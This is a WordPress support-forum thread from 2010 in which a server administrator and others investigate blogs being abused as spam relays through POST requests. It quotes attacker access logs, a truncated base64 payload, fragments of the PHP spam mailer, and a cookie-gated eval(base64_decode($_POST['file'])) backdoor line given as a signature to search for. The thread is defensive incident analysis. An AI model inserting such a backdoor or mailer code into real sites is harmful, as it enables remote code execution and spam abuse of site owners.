Support » Fixing WordPress » mail-spam relay over 3.0.1 POST exploit ? (base64_decode eval decrypt)

  • Since a few weeks, I have a few wordpress blogs misused as spam-relay. With apache mod_log_post I’ve now been able to catch the complete POST request, and here how it looks like (cf. below). This request here sends a spam to a gmail.com account.

    To prevent this, I had to add these lines to the .htaccess:

    <Limit POST>
    order deny,allow
    deny from all
    </Limit>

    (but this also prevents editing).

    Is this a known issue ? I saw some similar posts in the archives about 1-2 years ago, but nothing really similar and for the current 3.0.1 version.

    I’m still trying to find where in the WP code this ‘file’ variable is decoded and included, but no success yet. Maybe you will have a better idea?

    Regards,
    Olivier (managing the server, not the wp-setups)

    1) “raw” POST request:

    [Code moderated as per the Forum Rules. Please don’t re-post any hack code.]

    2) Decoded request:

    [Code moderated as per the Forum Rules. Please don’t re-post any hack code.]
    Thank you for your past orders with our company. We strive to improve our services and provide best delivery experience for your purchases.
    Please remember to place your orders on our new site. Once you get there please add it to your bookmarks for future reference.

    With kind regards,

    Support Team

    “.$fullname.”
    “.$address.”
    “.$city.”, “.$state.” “.$zipcode.”, “.$country;

    ##########################################################

    [Code moderated as per the Forum Rules.]

Viewing 13 replies - 1 through 13 (of 13 total)
  • Thread Starter omueller

    (@omueller)

    PS: just checked the logs, and it always seem to come from this host: unn-95-168-210-229.superhosting.cz (95.168.210.229), with a spam about every 5 minutes. Since it is blocked (with the .htaccess), it tries other urls…

    unn-95-168-210-229.superhosting.cz - - [16/Nov/2010:13:07:14 +0100] "POST / HTTP/1.1" 200 9 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
    unn-95-168-210-229.superhosting.cz - - [16/Nov/2010:13:18:15 +0100] "POST / HTTP/1.1" 200 32 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
    unn-95-168-210-229.superhosting.cz - - [16/Nov/2010:13:18:15 +0100] "POST / HTTP/1.1" 200 9 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
    unn-95-168-210-229.superhosting.cz - - [16/Nov/2010:13:43:09 +0100] "POST / HTTP/1.1" 403 202 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
    unn-95-168-210-229.superhosting.cz - - [16/Nov/2010:13:43:09 +0100] "POST /?s=google HTTP/1.1" 403 202 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
    unn-95-168-210-229.superhosting.cz - - [16/Nov/2010:13:43:09 +0100] "POST /wp-atom.php HTTP/1.1" 403 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
    unn-95-168-210-229.superhosting.cz - - [16/Nov/2010:13:43:09 +0100] "POST /wp-login.php HTTP/1.1" 403 214 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
    unn-95-168-210-229.superhosting.cz - - [16/Nov/2010:13:43:10 +0100] "POST /wp-login.php HTTP/1.1" 403 214 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
    unn-95-168-210-229.superhosting.cz - - [16/Nov/2010:13:43:33 +0100] "POST / HTTP/1.1" 403 202 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
    [...]
    Thread Starter omueller

    (@omueller)

    And here the “disabled” hack code (just to give an idea, otherwise there is no way to answer the issue anymore…). Hack-code has been removed.

    The question is why WordPress simply runs this code coming form a POST request with “file=xyz” as parameter ? Does it happen by default, or is it a bad configuration from the blog owner?

    1) “raw” POST request:

    Request: domain.ext 95.168.210.229 - - [16/Nov/2010:13:18:16 +0100] "POST / HTTP/1.1" 200 9 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3" jSLZPj4wA4wA
    ANRuqbIAAAAA "-"
    ----------------------------------------
    POST / HTTP/1.1
    Host: domain.ext
    Cookie: 545a398915a49f25=46b6f4af9be2faec;_wp_debugger=b5a7308802027b504c188deac3fa5c40;
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    Accept-Language: en-us,en;q=0.5
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
    Keep-Alive: 300
    Connection: keep-alive
    Content-Length: 8389
    Content-Type: application/x-www-form-urlencoded
    Expect: 100-continue
    
    8389
    file=QGV2YWwoZGVjcnlwdCgi...
    [censored]
    [censored]
    [censored]
    ...CiAgICB9DQogICAgcmV0dXJuICRyZXM7DQp9
    
    HTTP/1.1 200 OK
    Expires: Tue, 09 Nov 2010 12:18:16 GMT
    Last-Modified: Tue, 16 Nov 2010 12:18:16 GMT

    2) Decoded request:

    @eval(decrypt("...[censored]...")
    [...]

    3) Final spam code:

    unset($_POST['file']); $stage="second";
    [...]
    $domain = substr($from, strpos($from, "@"), strlen($from));
    $header = "From: ".$realname." <".$from.">\r\n";
    $header .= "Message-Id: <130746".mt_rand(1000,2000).".".mt_rand(0,2000).$domain.">\r\n";
    $header .= "MIME-Version: 1.0\r\n";
    $header .= "Content-Type: text/html\r\n";
    $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
    $header .= nl2br($message)."\r\n";
    
    if(mail($to,$subject,"",$header)) echo "mail_good";
    [...]
    Thread Starter omueller

    (@omueller)

    Strange, would I be the only one with this spam-problem?

    Good analysis!

    The POST-Request you posted matches exactly the hack described here:
    http://vanillaforums.org/discussion/8131/wp_debugger-error/p1

    Please check the index.php of your wordpress-installation for a code-injection with the following content:
    if(md5($_COOKIE['_wp_debugger'])=="c4460c548c319f361cd75496359cc674"){ eval(base64_decode($_POST['file'])); exit; }

    but at least this part:
    eval(base64_decode($_POST['file']));

    Than the interessting figures for further analysis are:
    * When was the index.php last modified?
    * Which updates (versions) did you do since the last modification date?
    * If you have still logs from this date, what requests where done at the same time in your ftp- and access-logs?
    * Maybe it is important to know where you get the update for your wordpress from.

    Did you already ‘grep’ your wordpress installation for this string $_POST['file']? (Because you write that you did already search after the variable)

    If you did update the question for the wordpress team should be, why this injection was not overwritten via the update.

    Thread Starter omueller

    (@omueller)

    thanks for your feedback heincredibleDude! Yes, it’s similar to this 2008 bug, but not exactly the same. I checked the files for “_wp_debugger” and other things (_POST[‘file’]) but with no success.

    index.php has been modified by the webdesigner, but doesn’t seem to contain any “bad” or injected code. But I also see many old files (from 2008) which should probably have been deleted or at least updated.

    I also just found a directory called “…” (3 dots) in the wp-content directory with some “strange” things inside:

    drwxrwxr-x  10      512 Aug 30 00:58 .
    drwxrwxrwx  10      512 Oct 26 14:13 ..
    drwxr-xr-x   4      512 Aug 30 00:58 addthis
    -rw-rw-r--   1      677 Aug 27 12:03 adrotator.php
    drwxrwxr-x   5      512 Aug 24  2009 audioplayer
    -rw-r--r--   1     2240 May  3  2010 hello.php
    -rw-r--r--   1       30 Apr 15  2009 index.php
    drwxrwxr-x   4      512 Feb  6  2009 photopress
    -rw-rw-r--   1   133120 Jun 10  2009 photopress.tar
    -rw-rw-r--   1    39846 Jun 10  2009 photopress_1.5.2.zip
    drwxrwxrwt   4      512 Jul 26  2009 postie
    -rw-rw-r--   1  1331253 Jun 10  2009 postie.1.2.3.zip
    -rw-rw-r--   1  1474560 Jun 10  2009 postie.tar
    drwxrwxr-x   7     1024 Aug 24  2009 proplayer
    drwxr-xr-x   5      512 Aug 27 14:49 quick-cache
    -rw-rw-r--   1     1823 Jun 10  2009 redirectify.php
    drwxrwxr-x   2      512 Jan  4  2010 videos-plugin
    -rw-rw-r--   1    31091 Jun 10  2009 wp-db-backup.php
    -rw-rw-r--   1    52709 Jun 10  2009 wp-super-cache.0.9.4.3.zip
    -rw-rw-r--   1     7613 Jun 10  2009 wp-xmlmigrate.php
    drwxr-xr-x   2      512 Aug 30 00:36 youtube
    -rw-rw-r--   1     1497 Jun 10  2009 youtube.1.php

    but there doesn’t seem to be any include “…/xyz” in the code. Maybe it was removed with the 3.0.1 upgrade, but there is definitely something to be done there.

    I will ask the webmaster to do a clean installation and to remove any old file first.

    To be continued!
    regards, O.

    Hi,

    i have found an additional injection described here:
    http://wordpress.org/support/topic/cant-save-edit-or-publish?replies=77#post-1079851

    if(isset($_GET['license']))

    Annother injection was done with the url ‘wordpress.net.in’ here:
    http://gordon.dewis.ca/2008/01/06/expunging-the-wordpressnetin-spam-injection-hijack/

    These files did contain the same inject like i described in my first post. Can you check for this injection?

    Thread Starter omueller

    (@omueller)

    Checked and nothing. All these “old” injections were for much older versions of WordPress: 3.0.1 is installed here… 🙂

    This is right, but are you sure that your wordpress was not hacked before the update?

    Can you post the source code of your actual index.php here?

    And additional: Can you check your database for unkown users with admin rihgts? Named like:
    WordPress or
    admina
    adminb

    adminz

    Then because of the “…”-directory. Can you check your FTP and Access-Logs at the creation timestamp of this directory. Mabye this was created via ftp.

    please post your source code here:
    http://wordpress.pastebin.com

    and report the link back here. Don’t post more than a few lines of code in the forums please!

    Thread Starter omueller

    (@omueller)

    No, I can’t be sure as I’m just the sysadmin there, no the webpage manager, but the spam-relay-issue is a problem for me, so that’s why I’m looking at that… But there was probably a problem before, because the blog was already relaying spams before the upgrade to 3.0.1 (it’s why it has been upgraded).

    DB looks ok, just one admin user and a few standard users.

    FTP log also ok, so it most probably came from the web. I will check the weblogs archive later.

    index.php is the same as in the wordpress-3.0.1.zip distribution.

    I guess there must be some files from old installations laying around… We’ll try an installation from scratch later this week or next week.

    Ok. When you have tidied up the webspace please observer the behaviour. If it still appears then please post here again.

    It is important for me if this hack can be really done via wordpress 3.0.1 because I have some installations in this version running.

    Thank you for sharing all this information!

    I noticed this same behavior on a v2.8.2 install. Logged first occurrence on Dec 9th. originating from 95.168.210.229. Any idea if this was addressed in the latest release? v3.0.3

    I started seeing spam being relayed through our network, and traced the requests back to exactly the same thing that iso00 has described here.

    I have confirmed the spam to have originated from blogs running WordPress 1.5, 2.1, and 2.5.1, so far. They all have the same characteristics so far. They were all POST requests to the index.php page, they all originated from 95.168.210.229. The spam mail payload is slightly different, but it’s still for a viagra pharmacy. The payload is as follows:

    “Hello,

    10 Days Sale Only – 10% off on everything in our store – this offer ends on Midnight January 30th.
    Do not wait – Use your coupon at check out today
    Your Discount Code: <b>weusduwiwoop</b>

    Happy New Year!
    CVS Team

    I’ve looked at the WordPress files for several of these sites, and there really is nothing in common with them. They don’t seem to have any themes or plugins installed in common. The source code appears to be unaltered (i.e. no malicious code modifications or injections).

    It’s a bit disturbing that this appears to be some long-standing function in WordPress that will happily perform the requested remote code execution. Has anyone tried the POST code that iso00 posted on a fresh, vanilla install of WordPress to verify whether this is the case?

Viewing 13 replies - 1 through 13 (of 13 total)
  • The topic ‘mail-spam relay over 3.0.1 POST exploit ? (base64_decode eval decrypt)’ is closed to new replies.